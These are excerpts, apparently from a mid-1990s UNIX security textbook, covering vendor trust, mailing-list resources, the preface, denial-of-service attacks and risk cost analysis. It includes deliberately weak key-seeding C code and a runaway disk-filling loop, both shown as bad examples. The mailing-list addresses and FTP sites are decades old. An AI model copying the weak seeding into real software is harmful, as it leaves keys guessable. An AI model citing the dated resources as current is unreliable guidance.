picture." As we noted in "Picking a Random Seed" in Chapter 23, a sophisticated encryption algorithm<br />

was built into Netscape Navigator to protect credit card numbers in transit on the network. Unfortunately,<br />

the implementation used a weak initialization of the "random number" used to generate a system key.<br />

The result? Someone with an account on a client machine could easily obtain enough information to<br />

crack the key in a matter of seconds, using only a small program.<br />
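
The general shape of the mistake (our sketch, not Netscape's actual code; the variable names are ours) is seeding a generator only with values that a local user can observe or guess:

#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <unistd.h>

int
main(void)
{
    struct timeval tv;
    unsigned long seed;

    /* Weak: the time of day and the process IDs are visible to, or easily
       guessed by, someone else on the machine, so the entire seed space
       can be searched by brute force in seconds. */
    gettimeofday(&tv, NULL);
    seed = (unsigned long) tv.tv_sec ^ (unsigned long) tv.tv_usec
         ^ (unsigned long) getpid() ^ (unsigned long) getppid();
    srand((unsigned) seed);

    printf("\"secret\" key material: %04x%04x\n",
           rand() & 0xffff, rand() & 0xffff);

    /* Better: mix in quantities an outside observer cannot see, such as a
       hardware noise source or a kernel-maintained pool of randomness
       where one is available. */
    return 0;
}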


27.2.4 Hacker Challenges<br />

Over the past decade, several vendors have issued public challenges stating that their systems are secure<br />

because they haven't been broken by "hacker challenges." Usually, these challenges involve some vendor<br />

putting its system on the <strong>Internet</strong> and inviting all comers to take a whack in return for some token prize.<br />

Then, after a few weeks or months, the vendor shuts down the site, proclaims their product invulnerable,<br />

and advertises the results as if they were a badge of honor. But consider the following:<br />

● Few such "challenges" are conducted using established testing techniques. They are ad hoc, random tests.

● That no problems are found does not mean that no problems exist. The testers might not have exposed them yet. Or, the testers might not have recognized them. (Consider how often software is released with bugs, even after careful scrutiny.) Furthermore, how do you know that the testers will report what they find? In some cases, the information may be more valuable to the hackers later on, after the product has been sold to many customers - because at that time, they'll have more profitable targets to pursue.

● Simply because the vendor does not report a successful penetration does not mean that one did not occur - the vendor may choose not to report it because it would reflect poorly on the product. Or, the vendor may not have recognized the penetration.

● Challenges give potential miscreants some period to practice breaking the system without penalty. Challenges also give miscreants an excuse if they are caught trying to break into the system later (e.g., "We thought the contest was still going on.")

● Seldom do the really good experts, on either side of the fence, participate in such exercises. Thus, anything done is usually done by amateurs. (The "honor" of having won the challenge is not sufficient to lure the good ones into the challenge. Think about it - good consultants can command fees of several thousand dollars per day in some cases - why should they effectively donate their time and names for free advertising?)

Furthermore, the whole process sends the wrong messages - that we should build things and then try to<br />

break them (rather than building them right in the first place), or that there is some prestige or glory in<br />

breaking systems. We don't test the strengths of bridges by driving over them with a variety of cars and<br />

trucks to see if they fail, and pronounce them safe if no collapse occurs during the test.<br />

Some software designers could learn a lot from civil engineers. So might the rest of us: in ancient times,<br />

if a house fell or a bridge collapsed and injured someone, the engineer who designed it was crushed to<br />

death in the rubble as punishment!<br />

Next time you see an advertiser using a challenge to sell a product, you should ask if the challenger is<br />

really giving you more confidence in the product...or convincing you that the vendor doesn't have a clue<br />

as to how to really design and test security.<br />

If you think that a security challenge builds the right kind of trust, then get in touch with us. We have<br />

these magic pendants. No one wearing one has ever had a system broken into, despite challenges to all<br />

the computer users who happened to be around when the systems were developed. Thus, the pendants<br />

must be effective at keeping out hackers. We'll be happy to sell some to you. After all, we employ the<br />


same rigorous testing methodology as your security software vendors, so our product must be reliable,<br />

right?<br />

27.2.5 <strong>Sec</strong>urity Bugs that Never Get Fixed<br />

There is also the question of legitimate software distributed by computer manufacturers that contains<br />

glaring security holes. More than a year after the release of sendmail Version 8, nearly every major<br />

<strong>UNIX</strong> vendor was still distributing its computers equipped with sendmail Version 5. (Versions 6 and 7<br />

were interim versions that were never generally released.) While Version 8 had many improvements over

Version 5, it also had many critical security patches. Was the unwillingness of <strong>UNIX</strong> vendors to adopt<br />

Version 8 negligence - a demonstration of their laissez-faire attitude towards computer security - or<br />

merely a reflection of pressing market conditions?[4] Are the two really different?<br />

[4] Or was the new, "improved" program simply too hard to configure? At least one vendor<br />

told us that it was.<br />

How about the case in which many vendors still release versions of TFTP that, by default, allow remote<br />

users to obtain copies of the password file? What about versions of RPC that allow users to spoof NFS<br />

by using proxy calls through the RPC system? What about software that includes a writable utmp file that<br />

enables a user to overwrite arbitrary system files? Each of these cases is a well-known security flaw. In<br />

each case, the vendors did not provide fixes for years - even now, they may not be fixed.<br />

Many vendors say that computer security is not a high priority, because they are not convinced that<br />

spending more money on computer security will pay off for them. Computer companies are rightly<br />

concerned with the amount of money that they spend on computer security. Developing a more secure<br />

computer is an expensive proposition that not every customer may be willing to pay for. The same level<br />

of computer security may not be necessary for a server on the <strong>Internet</strong> as for a server behind a corporate<br />

firewall, or on a disconnected network. Furthermore, increased computer security will not automatically<br />

increase sales: firms that want security generally hire staff who are responsible for keeping systems<br />

secure; users who do not want (or do not understand) security are usually unwilling to pay for it at any<br />

price, and frequently disable security when it is provided.<br />

On the other hand, a computer company is far better equipped to safeguard the security of its operating<br />

system than is an individual user. One reason is that a computer company has access to the system's<br />

source code. A second reason is that most large companies can easily devote two or three people to<br />

assuring the security of their operating system, whereas most businesses are hard-pressed to devote even<br />

a single full-time employee to the job of computer security.<br />

We believe that computer users are beginning to see system security and software quality as<br />

distinguishing features, much in the way that they see usability, performance, and new functionality as<br />

features. When a person breaks into a computer, over the <strong>Internet</strong> or otherwise, the act reflects poorly on<br />

the maker of the software. We hope that computer companies will soon make software quality at least as<br />

important as new features.<br />


27.2.6 Network Providers that Network Too Well<br />

Network providers pose special challenges for businesses and individuals. By their nature, network<br />

providers have computers that connect directly to your computer network, placing the provider (or<br />

perhaps a rogue employee at the providing company) in an ideal position to launch an attack against your<br />

installation. For consumers, providers are usually in possession of confidential billing information<br />

belonging to the users. Some providers even have the ability to directly make charges to a user's credit<br />

card or to deduct funds from a user's bank account.<br />

Dan Geer, a Cambridge-based computer security professional, tells an interesting story about an<br />

investment brokerage firm that set up a series of direct IP connections between its clients' computers and<br />

the computers at the brokerage firm. The purpose of the links was to allow the clients to trade directly on<br />

the brokerage firm's computer system. But as the client firms were also competitors, the brokerage house<br />

equipped the link with a variety of sophisticated firewall systems.<br />

It turns out, says Geer, that although the firm had protected itself from its clients, it did not invest the<br />

time or money to protect the clients from each other. One of the firm's clients proceeded to use the direct<br />

connection to break into the system operated by another client. A significant amount of proprietary<br />

information was stolen before the intrusion was discovered.<br />

In another case, a series of articles appearing in The New York Times during the first few months of 1995<br />

revealed how hacker Kevin Mitnick allegedly broke into a computer system operated by Netcom<br />

Communications. One of the things that Mitnick is alleged to have stolen was a complete copy of<br />

Netcom's client database, including the credit card numbers for more than 30,000 of Netcom's customers.<br />

Certainly, Netcom needed the credit card numbers to bill its customers for service. But why were they<br />

placed on a computer system that could be reached from the <strong>Internet</strong>? Why were they not encrypted?<br />

Think about all those services that are sprouting up on the World Wide Web. They claim to use all kinds<br />

of super encryption protocols to safeguard your credit card number as it is sent across the network. But<br />

remember - you can reach their machines via the <strong>Internet</strong> to make the transaction. What kinds of<br />

safeguards do they have in place at their sites to protect all the card numbers after they're collected? If<br />

you saw an armored car transferring your bank's receipts to a "vault" housed in a cardboard box on a park<br />

bench, would the strength of the armored car cause you to trust the safety of the funds?<br />




Appendix E<br />

E. Electronic Resources<br />

Contents:<br />

Mailing Lists<br />

Usenet Groups<br />

WWW Pages<br />

Software Resources<br />

There is a certain irony in trying to include a comprehensive list of electronic resources in a printed book<br />

such as this one. Electronic resources such as Web pages, newsgroups, and mailing lists are updated on<br />

an hourly basis; new releases of computer programs can be published every few weeks.<br />

Books, on the other hand, are infrequently updated. The first edition of <strong>Practical</strong> <strong>UNIX</strong> <strong>Sec</strong>urity, for<br />

instance, was written between 1989 and 1990, and published in 1991. This revised edition was started in<br />

1995 and not published until 1996. Interim reprintings incorporated corrections, but did not include new<br />

material.<br />

Some of the programs listed in this appendix appear to be "dead," or, in the vernacular jargon of<br />

academia, "completed." For instance, consider the case of COPS, developed as a student project by Dan<br />

Farmer at Purdue University under the direction of Gene Spafford. The COPS program is still referenced<br />

by many first-rate texts on computer security. But as of early 1996, COPS hasn't been updated in more<br />

than four years and fails to install cleanly on many major versions of <strong>UNIX</strong>; Dan Farmer has long since<br />

left Gene's tutelage and gone on to fame, fortune, and other projects (such as the SATAN tool). COPS<br />

rests moribund on the COAST FTP server, apparently a dead project. Nevertheless, before this book is<br />

revised for a third time, there exists the chance that someone else will take up COPS and put a new face<br />

on it. And, we note that there is still some value in applying COPS - some of the flaws that it finds are<br />

still present in systems shipped by some vendors (assuming that you can get the program to compile).<br />

We thus present the following electronic resources with the understanding that this list necessarily cannot<br />

be complete nor completely up to date. What we hope, instead, is that it is expansive. By reading it, we<br />

hope that you will gain insight into places to look for future developments in computer security. Along<br />

the way, you may find some information you can put to immediate use.<br />


E.1 Mailing Lists<br />

There are many mailing lists that cover security-related material. We describe a few of the major ones<br />

here. However, this is not to imply that only these lists are worthy of mention! There may well be other<br />

lists of which we are unaware, and many of the lesser-known lists often have a higher volume of good<br />

information.<br />

NOTE: Never place blind faith in anything you read in a mailing list, especially if the list is<br />

unmoderated. There are a number of self-styled experts on the net who will not hesitate to<br />

volunteer their views, whether knowledgeable or not. Usually their advice is benign, but<br />

sometimes it is quite dangerous. There may also be people who are providing bad advice on<br />

purpose, as a form of vandalism. And certainly there are times where the real experts make a<br />

mistake or two in what they recommend in an offhand note posted to the net.<br />

There are some real experts on these lists who are (happily) willing to share their knowledge<br />

with the community, and their contributions make the <strong>Internet</strong> a better place. However, keep<br />

in mind that simply because you read it on the network does not mean that the information is<br />

correct for your system or environment, does not mean that it has been carefully thought out,<br />

does not mean that it matches your site policy, and most certainly does not mean that it will<br />

help your security. Always evaluate carefully the information you receive before acting on it.<br />

E.1.1 Response Teams and Vendors<br />

Many of the incident response teams (listed in Appendix F) have mailing lists for their advisories and<br />

alerts. If you can be classified as one of their constituents, you should contact the appropriate team(s) to<br />

be placed on their mailing lists.<br />

Many vendors also have mailing lists for updates and advisories concerning their products. These include<br />

computer vendors, firewall vendors, and vendors of security software (including some freeware and<br />

shareware products). You may wish to contact your vendors to see if they have such lists, and if so, join.<br />

E.1.2 A Big Problem With Mailing Lists<br />

The problem with all these lists is that you can easily overwhelm yourself. If you are on lists from two<br />

response teams, four vendors, and another half-dozen general-purpose lists, you may find yourself<br />

filtering several hundred messages a day whenever a new general vulnerability is discovered. At the<br />

same time, you don't want to unsubscribe from these lists, because you might then miss the timely<br />

announcement of a special-case fix for your own systems.<br />

One method that we have seen others use with some success is to split the mailing lists up among a group<br />

of administrators. Each person gets one or two lists to monitor, with particularly useful messages then<br />

redistributed to the entire group. Be certain to arrange coverage of these lists if someone leaves or goes<br />

on vacation, however!<br />

Another approach is to feed these messages into Usenet newsgroups you create locally especially for this<br />

purpose. This strategy allows you to read the messages using an advanced newsreader that will allow you<br />

to kill message chains or trigger on keywords. It may also help provide an archiving mechanism to allow<br />


you to keep several days or weeks (or more) of the messages.<br />

E.1.3 Major Mailing Lists<br />

These are some of the major mailing lists.<br />

E.1.3.1 Academic-Firewalls<br />

The Academic-Firewalls mailing list is for people interested in discussing firewalls in the academic<br />

environment. This mailing list is hosted at Texas A&M University. To subscribe, send "subscribe<br />

academic-firewalls" in the body of a message to majordomo@net.tamu.edu.<br />

Academic-Firewalls is archived at:<br />

ftp://net.tamu.edu/pub/security/lists/academic-firewalls/<br />

E.1.3.2 Best of security<br />

This is a non-discussion mailing list for remailing items from other security-oriented mailing lists. It is<br />

intended for subscribers to forward the "best" of other mailing lists - avoiding the usual debate,<br />

argument, and disinformation present on many lists.<br />

To subscribe to this particular mailing list, send "subscribe best-of-security" in the body of a message to<br />

best-of-security-request@suburbia.net.<br />

E.1.3.3 Bugtraq<br />

Bugtraq is a full-disclosure computer security mailing list. This list features detailed discussion of <strong>UNIX</strong><br />

security holes: what they are, how to exploit them, and what to do to fix them. This list is not intended to<br />

be about cracking systems or exploiting their vulnerabilities (although that is known to be the intent of<br />

some of the subscribers). It is, instead, about defining, recognizing, and preventing use of security holes<br />

and risks. To subscribe, send "subscribe bugtraq" in the body of a message to bugtraq-request@fc.net.<br />

Note that we have seen some incredibly incorrect and downright bad advice posted to this list.<br />

Individuals who attempt to point out errors or corrections are often roundly flamed as being<br />

"anti-disclosure." Post to this list with caution if you are the timid sort.<br />

E.1.3.4 CERT-advisory<br />

New CERT-CC advisories of security flaws and fixes for <strong>Internet</strong> systems are posted to this list. This list<br />

makes somewhat boring reading; often the advisories are so watered down that you cannot easily figure<br />

out what is actually being described. Nevertheless, the list does have its bright spots. Send subscription<br />

requests to cert-advisory-request@cert.org.<br />

Archived past advisories are available from info.cert.org via anonymous FTP from:<br />

ftp://info.cert.org/<br />

ftp://coast.cs.purdue.edu/pub/alert/CERT<br />


E.1.3.5 CIAC-notes<br />

The staff at the Department of Energy CIAC publish helpful technical notes on an infrequent basis.<br />

These are very often tutorial in nature. To subscribe to the list, send a message with "subscribe ciac-notes<br />

yourname" in the message body to ciac-listproc@llnl.gov. Or, you may simply wish to browse the<br />

archive of old notes:<br />

ftp://ciac.llnl.gov/pub/ciac/notes<br />

ftp://coast.cs.purdue.edu/pub/alert/CIAC/notes<br />

E.1.3.6 Computer underground digest<br />

A curious mixture of postings on privacy, security, law, and the computer underground fill this list.<br />

Despite the name, this list is not a digest of material by the "underground" - it contains information about<br />

the computing milieux. To subscribe, send a mail message with the subject line "subscribe cu-digest" to<br />

cu-digest@weber.ucsd.edu.<br />

This list is also available as the newsgroup comp.society.cu-digest on the Usenet; the newsgroup is the<br />

preferred means of distribution. The list is archived at numerous places around the <strong>Internet</strong>, including:<br />

ftp://ftp.eff.org/pub/Publications/CuD<br />

E.1.3.7 Firewalls<br />

The Firewalls mailing list, which is hosted by Great Circle Associates, is the primary forum for folks on<br />

the <strong>Internet</strong> who want to discuss the design, construction, operation, maintenance, and philosophy of<br />

<strong>Internet</strong> firewall security systems. To subscribe, send a message to majordomo@greatcircle.com with<br />

"subscribe firewalls" in the body of the message.<br />

The Firewalls mailing list is usually high volume (sometimes more than 100 messages per day, although<br />

usually it is only several dozen per day). To accommodate subscribers who don't want their mailboxes

flooded with lots of separate messages from Firewalls, there is also a Firewalls-Digest mailing list<br />

available. Subscribers to Firewalls-Digest receive daily (more frequent on busy days) digests of messages<br />

sent to Firewalls, rather than each message individually. Firewalls-Digest subscribers get all the same<br />

messages as Firewalls subscribers; that is, Firewalls-Digest is not moderated, just distributed in digest<br />

form.<br />

The mailing list is archived:<br />

ftp://ftp.greatcircle.com/pub/firewalls/<br />

http://www.greatcircle.com/firewalls<br />

E.1.3.8 FWALL-user<br />

The FWALL-users mailing list is for discussions of problems, solutions, etc. among users of the TIS<br />

<strong>Internet</strong> Firewall Toolkit (FWTK). To subscribe, send email to fwall-users-request@tis.com.<br />


E.1.3.9 RISKS<br />

RISKS is officially known as the ACM Forum on Risks to the Public in the Use of Computers and<br />

Related Systems. It's a moderated forum for discussion of risks to society from computers and<br />

computerization. Send email subscription requests to RISKS-Request@csl.sri.com.<br />

Back issues are available from unix.sri.com via anonymous FTP:<br />

ftp://unix.sri.com/risks/<br />

RISKS is also distributed as the comp.risks Usenet newsgroup, and this is the preferred method of<br />

subscription.<br />

E.1.3.10 WWW-security<br />

The WWW-security mailing list discusses the security aspects of WWW servers and clients. To<br />

subscribe, send "subscribe www-security" in the body of a message to majordomo@nsmx.rutgers.edu.<br />




Preface<br />

Contents:<br />

<strong>UNIX</strong> "<strong>Sec</strong>urity"?<br />

Scope of This Book<br />

Which <strong>UNIX</strong> System?<br />

Conventions Used in This Book<br />

Online Information<br />

Acknowledgments<br />

Comments and Questions<br />

A Note to Computer Crackers<br />


It's been five years since the publication of the first edition of <strong>Practical</strong> <strong>UNIX</strong> <strong>Sec</strong>urity, and oh, what a<br />

difference a little bit of time makes!<br />

In 1991, the only thing that most Americans knew about <strong>UNIX</strong> and the <strong>Internet</strong> was that it was the venue<br />

that had been besieged by a "computer virus" in 1988. Today, more than 10 million Americans use the<br />

<strong>Internet</strong> on a regular basis to send electronic mail, cruise the World Wide Web, and even shop. In 1991,<br />

we called the <strong>Internet</strong> a "global village." Today, it is an Information Highway that's getting larger and<br />

more crowded by the minute, with millions of users from hundreds of countries on all seven continents<br />

electronically connected to each other.<br />

And yet, despite our greater reliance on network computing, the <strong>Internet</strong> isn't a safer place today than it<br />

was in 1991. If anything, the <strong>Internet</strong> is quickly becoming the Wild West of cyberspace. Although<br />

academics and industry leaders have long known about fundamental vulnerabilities of computers<br />

connected to the <strong>Internet</strong>, these flaws have been accommodated rather than corrected. As a result, we<br />

have seen many cases within the past few years of wide-scale security infractions throughout the<br />

network; in one single case, more than 30,000 people had their passwords stolen and accounts<br />

compromised; in another, more than 20,000 credit card numbers were allegedly stolen from one company<br />

in a single unauthorized access.<br />

Computer crime is a growing problem. One recent study by the Yankee Group, a research analysis firm,<br />

estimated that losses of productivity, customer confidence, and competitive advantage as a result of<br />

computer security breaches could cost U.S. businesses alone more than $5 billion annually.[1] Other<br />

studies, cited in a 1995 Computer <strong>Sec</strong>urity Institute publication, Current and Future Danger,[2] indicated:<br />


● Combined losses from computer and telecommunications fraud in the U.S. alone may be over $10 billion a year, and growing.

● Almost 25% of all organizations have experienced a verifiable computer crime in the 12 months preceding the survey.

● Theft of proprietary business information, as reported monthly, rose 260% during the five-year period from 1988 to 1993.

[1] "Securing the LAN Environment," The Yankee Group, January 1994 White Paper (+1-617-367-1000).

[2] Power, Richard. Current and Future Danger: A CSI Primer on Computer Crime and Information Warfare. Computer Security Institute, 1995.

Another 1995 study, Computer Crime in America,[3] reported that:<br />

● 98.5% of all businesses surveyed had been victims of some form of computer crime.

● 43.3% of the businesses reported having been the victims of computer crimes more than 25 times.

● Unauthorized access to computer files for "snooping" (as opposed to outright theft) has increased by over 95% in the past five years.

● Software piracy - improper copying of software in violation of copyrights - has increased by over 91% in the past five years.

● Intentional introduction of viruses into corporate networks is up over 66% in the past five years.

● Unauthorized access to business information and theft of proprietary information are up over 75% in the last five years.

[3] Carter, David and Andra Katz. Computer Crime in America. Michigan State University, 1995.

And remember, the majority of computer security incidents are never discovered or reported!<br />

In late 1995, the magazine Information Week and the accounting firm Ernst & Young conducted a<br />

survey of major companies in America and found that more than 20 had lost more than $1 million worth<br />

of information as a result of a security lapse in the previous two years. The survey also found that more<br />

than 80% had a full-time information security director, and nearly 70% thought that the computer<br />

security threat to companies had increased within the past five years.<br />

What do all of these numbers mean for <strong>UNIX</strong>? Because of the widespread use of <strong>UNIX</strong> as the operating<br />

system of choice on the <strong>Internet</strong>, and its prevalence in client/server environments, it is undoubtedly the<br />

case that many <strong>UNIX</strong> machines were involved in these incidents. Because of its continuing use in these<br />

environments, UNIX may be involved in the majority of incidents yet to come - the statistics and trends

are disturbing. We hope that this new edition of our book helps limit the scope and number of these new<br />

incidents.<br />


<strong>UNIX</strong> "<strong>Sec</strong>urity"?<br />

When the first version of this book appeared in 1991, many people thought that the words "<strong>UNIX</strong><br />

security" were an oxymoron-two words that appeared to contradict each other, much like the words<br />

"jumbo shrimp" or "Congressional action." After all, the ease with which a <strong>UNIX</strong> guru could break into a<br />

system, seize control, and wreak havoc was legendary in the computer community. Some people couldn't<br />

even imagine that a computer running <strong>UNIX</strong> could be made secure.<br />

Since then, the whole world of computers has changed. These days, many people regard <strong>UNIX</strong> as a<br />

relatively secure operating system...at least, they use <strong>UNIX</strong> as if it were. Today, <strong>UNIX</strong> is used by<br />

millions of people and many thousands of organizations around the world, all without obvious major<br />

mishap. And while <strong>UNIX</strong> was not designed with military-level security in mind, it was built both to<br />

withstand limited external attacks and to protect users from the accidental or malicious actions of other<br />

users on the system. Years of constant use and study have made the operating system even more secure,<br />

because most of the <strong>UNIX</strong> security faults are publicized and fixed.<br />

But the truth is, <strong>UNIX</strong> really hasn't become significantly more secure with its increase in popularity.<br />

That's because fundamental flaws still remain in the interaction of the operating system's design and its<br />

uses. The <strong>UNIX</strong> superuser remains a single point of attack: any intruder or insider who can become the<br />

<strong>UNIX</strong> superuser can take over the system, booby-trap its programs, and hold the computer's users<br />

hostage - sometimes even without their knowledge.

One thing that has improved is our understanding of how to keep a computer relatively secure. In recent<br />

years, a wide variety of tools and techniques have been developed with the single goal of helping system<br />

administrators secure their <strong>UNIX</strong> computers. Another thing that's changed is the level of understanding<br />

of <strong>UNIX</strong> by system administrators: now it is relatively easy for companies and other organizations to hire<br />

a professional system manager who will be concerned about computer security and make it a top priority.<br />

This book can help.<br />

What This Book Is<br />

This book is a practical guide to <strong>UNIX</strong> security. For users, we explain what computer security is,<br />

describe some of the dangers that you may face, and tell you how to keep your data safe and sound. For<br />

administrators, we explain in greater detail how <strong>UNIX</strong> security mechanisms work and tell how to<br />

configure and administer your computer for maximum protection. For everybody, we try to teach<br />

something about <strong>UNIX</strong>'s internals, its history, and how to keep yourself from getting burned.<br />

Is this book for you? Probably. If you administer a <strong>UNIX</strong> system, you will find many tips for running<br />

your computer more securely. Even if you're a casual user of a <strong>UNIX</strong> system, you should read this book.<br />

If you are a complete novice at <strong>UNIX</strong>, you will benefit from reading this book, because it contains a<br />

thorough overview of the <strong>UNIX</strong> operating system in general. You don't want to stay a <strong>UNIX</strong> novice<br />

forever! (But you might want to read some other <strong>O'Reilly</strong> books first; consult Appendix D, Paper<br />

Sources, for some suggestions.)<br />

What we've done here has been to collect helpful information concerning how to secure your <strong>UNIX</strong><br />

system against threats, both internal and external. Most of the material is intended for a <strong>UNIX</strong> system<br />


administrator or manager. In most cases, we've presented material and commands without explaining in<br />

any detail how they work, and in several cases we've simply pointed out the nature of the commands and<br />

files that need to be examined; we've assumed that a typical system administrator is familiar with the<br />

commands and files of his or her system, or at least has the manuals available to study.<br />

A Note About Your Manuals<br />

Some people may think that it is a cop-out for a book on computer security to advise the reader to read<br />

his or her system manuals. But it's not. The fact is, computer vendors change their software much faster<br />

(and with less notice) than publishers bring out new editions of books. If you are concerned about<br />

running your computer securely, then you should spend the extra time to read your manuals to verify<br />

what we say. You should also experiment with your running system, to make sure that the programs<br />

behave the way they are documented.<br />

Thus, we recommend that you go back and read through the manuals every few months to stay familiar<br />

with your system. Sometimes rereading the manuals after gaining new experience gives you added<br />

insight. Other times it reminds you of useful features that you aren't yet using. Many successful system<br />

administrators have told us that they make it a point to reread all their manuals every 6 to 12 months!<br />

Certain key parts of this book were written in greater detail than the rest, with a novice user in mind. We<br />

have done this for two reasons: to be sure that important <strong>UNIX</strong> security concepts are presented to the<br />

fullest and to make important sections (such as the ones on file permissions and passwords) readable on<br />

their own. That way, this book can be passed around with a note saying, "Read Chapter 3, Users and<br />

Passwords to learn about how to set passwords."[4]<br />

[4] Remember to pass around the book itself or get another copy to share. If you were to<br />

make a photocopy of the pages to circulate, it would be a significant violation of the<br />

copyright. This sets a bad example about respect for laws and rules, and conveys a message<br />

contrary to good security policy!<br />

What This Book Is Not<br />

This book is not intended to be a <strong>UNIX</strong> tutorial. Neither is this book a system administration<br />

tutorial - there are better books for that,[5] and good system administrators need to know about much more

than security. Use this book as an adjunct to tutorials and administration guides.<br />

[5] A few of which we have listed in Appendix D.<br />

This book is also not a general text on computer security - we've tried to keep the formalisms to a

minimum. Thus, this is not a book that is likely to help you design new security mechanisms for <strong>UNIX</strong>,<br />

although we have included a chapter on how to write more secure programs.<br />

We've also tried to minimize the amount of information in this book that would be useful to people trying<br />

to break into computer systems. If that is your goal, then this book probably isn't for you.<br />

We have also tried to resist the temptation to suggest:

● Replacements for your standard commands
● Modifications to your kernel
● Other significant programming exercises to protect your system

The reason has to do with our definition of practical. For security measures to be effective, they need to be generally applicable. Most users of commercial systems do not have access to the source code, and many don't even have access to compilers for their systems. Public domain sources for some replacement commands are unlikely to have support for the special features different vendors add to their systems. If we were to suggest changes, they might not be applicable to every platform of interest.

There is also a problem associated with managing wide-scale changes. Not only may changes make the system more difficult to maintain, but changes may be impossible to manage across dozens of architectures in different locations and configurations. They also will make vendor maintenance more difficult - how can vendors respond to bug reports for software that they didn't provide?

Last of all, we have seen many programs and suggested fixes posted on the Internet that are incorrect or even dangerous. Many administrators of commercial and academic systems do not have the necessary expertise to evaluate the overall security impact of changes to their system's kernel, architecture, or commands. If you routinely download and install third-party patches and programs to improve your system's security, your overall security may well be worse in the long term.

For all of these reasons, our emphasis is on using tools provided with your operating systems. Where there are exceptions to this rule, we will explain our reasoning.



Chapter 25. Denial of Service Attacks and Solutions

Contents:
Destructive Attacks
Overload Attacks
Network Denial of Service Attacks

In cases where denial of service attacks did occur, it was either by accident or relatively easy to figure out who was responsible. The individual could be disciplined outside the operating system by other means.

- Dennis Ritchie

A denial of service attack is an attack in which one user takes up so much of a shared resource that none of the resource is left for other users. Denial of service attacks compromise the availability of the resources. Those resources can be processes, disk space, percentage of CPU, printer paper, modems, or the time of a harried system administrator. The result is degradation or loss of service.

UNIX provides few types of protection against accidental or intentional denial of service attacks. Most versions of UNIX allow you to limit the maximum number of files or processes that a user is allowed. Some versions also let you place limits on the amount of disk space consumed by any single UID (account). But compared with other operating systems, UNIX is downright primitive in its mechanisms for preventing denial of service attacks.
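As a rough illustration of these mechanisms (the exact command names, units, and availability vary from vendor to vendor, so treat this only as a sketch and check your own manuals), per-process limits are typically set from the shell, and disk limits with the quota system:

% limit                          # C shell: display the current per-process limits
% limit filesize 10000           # C shell: cap the largest file a process may create
$ ulimit -f 10000                # Bourne-style shells: the equivalent cap (units vary by system)
# quota -v alice                 # report disk quotas for a user ("alice" is a made-up name),
                                 # on systems where disk quotas have been enabled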

This is a short chapter because, as Ritchie noted, it is usually easy to determine who is responsible for a denial of service attack and to take appropriate action.

There are two types of denial of service attacks. The first type of attack attempts to damage or destroy resources so you can't use them. Examples range from causing a disk crash that halts your system to deleting critical commands like cc and ls.

The second type of attack overloads some system service or exhausts some resource (either deliberately by an attacker, or accidentally as the result of a user's mistake), thus preventing others from using that service. The simplest type of overload involves filling up a disk partition so that users and system programs can't create new files. The "bacteria" discussed in Chapter 11, Protecting Against Programmed Threats, perform this kind of attack.

Many denial of service problems in this second category result from user error or runaway programs rather than explicit attacks. For example, one common cause is a typographical error in a program, or a reversed condition, such as writing x == 0 when you really meant to type x != 0.
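As an illustration (not taken from any particular program), here is a minimal sketch of how a reversed test can turn into an accidental denial of service; the filenames are invented, and the intent of the script was to wait while another job held a lock file:

#!/bin/sh
# Intended: loop while /tmp/job.lock exists.  The test is reversed
# (! -f instead of -f), so once the lock file is absent the loop never
# exits, and the log file grows until the partition holding /tmp fills.
while [ ! -f /tmp/job.lock ]
do
    echo "waiting for lock at `date`" >> /tmp/wait.log
done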

25.1 Destructive Attacks

There are a number of ways to destroy or damage information in a fashion that denies service. Almost all of the attacks we know about can be prevented by restricting access to critical accounts and files, and protecting them from unauthorized users. If you follow good security practice to protect the integrity of your system, you will also prevent destructive denial of service attacks. Table 25.1 lists some potential attacks and how to prevent them.

Table 25.1: Potential Attacks and Their Prevention

Attack: Reformatting a disk partition or running the newfs/mkfs command
Prevention: Prevent anyone from accessing the machine in single-user mode. Protect the superuser account. Physically write-protect disks that are used read-only.

Attack: Deleting critical files (e.g., needed files in /dev or the /etc/passwd file)
Prevention: Protect system files and accounts by specifying appropriate modes (e.g., 755 or 711). Protect the superuser account. Set ownership of NFS-mounted files to user root and export read-only.

Attack: Shutting off power to the computer
Prevention: Put the computer in a physically secure location. Put a lock on circuit-breaker boxes, or place them in locked rooms. (However, be sure to check the National Electric Code Section 100 regarding the accessibility of emergency shutoffs. Remember that a computer that is experiencing an electrical fire is not very secure.)

Attack: Cutting network or terminal cables
Prevention: Run cables and wires through conduits to their destinations. Restrict access to rooms where the wires are exposed.
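To make the file-mode and read-only export advice in Table 25.1 concrete, here is a minimal sketch; the modes shown are common choices rather than a prescription, and the /etc/exports syntax shown is the traditional SunOS/BSD form, which varies by vendor:

# chmod 755 /etc /dev             # directories readable and searchable, writable only by root
# chmod 644 /etc/passwd           # world-readable, writable only by root
# cat /etc/exports                # export filesystems read-only where possible
/usr    -ro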



Chapter 2. Policies and Guidelines

2.3 Cost-Benefit Analysis

After you complete your risk assessment, you need to assign a cost to each risk and determine the cost of defending against it. This is called a cost-benefit analysis.

2.3.1 The Cost of Loss

Computing costs can be very difficult. A simple cost calculation might take into account only the cost of repairing or replacing a particular item. A more sophisticated cost calculation can consider the cost of having equipment out of service, the cost of added training, the cost of additional procedures resulting from a loss, the cost to a company's reputation, and even the cost to a company's clients. Generally speaking, including more factors in your cost calculation will increase your effort, but will also increase the accuracy of your calculations.

For most purposes, you do not need to assign an exact value to each possible risk. Normally, assigning a cost range to each item is sufficient. For instance, the loss of a dozen blank diskettes may be classed as "under $500," while a destructive fire in your computer room might be classed as "over $1,000,000." Some items may actually fall into the category "irreparable/irreplaceable"; this could include the loss of your entire accounts-due database, or the death of a key employee.

You may want to assign these costs based on a finer scale of loss than simply "lost/not lost." For instance, you might want to assign separate costs for each of the following categories (these are not in rank order):

● Non-availability over a short term (< 7-10 days)
● Non-availability over a medium term (1-2 weeks)
● Non-availability over a long term (more than 2 weeks)
● Permanent loss or destruction
● Accidental partial loss or damage
● Deliberate partial loss or damage
● Unauthorized disclosure within the organization
● Unauthorized disclosure to some outsiders
● Unauthorized full disclosure to outsiders, competitors, and the press
● Replacement or recovery cost

2.3.2 The Cost of Prevention

Finally, you need to calculate the cost of preventing each kind of loss.

For instance, the cost to recover from a momentary power failure is probably only that of personnel "downtime" and the time necessary to reboot. However, the cost of prevention may be that of buying and installing a UPS system.

Costs need to be amortized over the expected lifetime of your approaches, as appropriate. Deriving these costs may reveal secondary costs and credits that should also be factored in. For instance, installing a better fire-suppression system may result in a yearly decrease in your fire insurance premiums and give you a tax benefit for capital depreciation. But spending money on a fire-suppression system means that the money is not available for other purposes, such as increased employee training, or even investing.

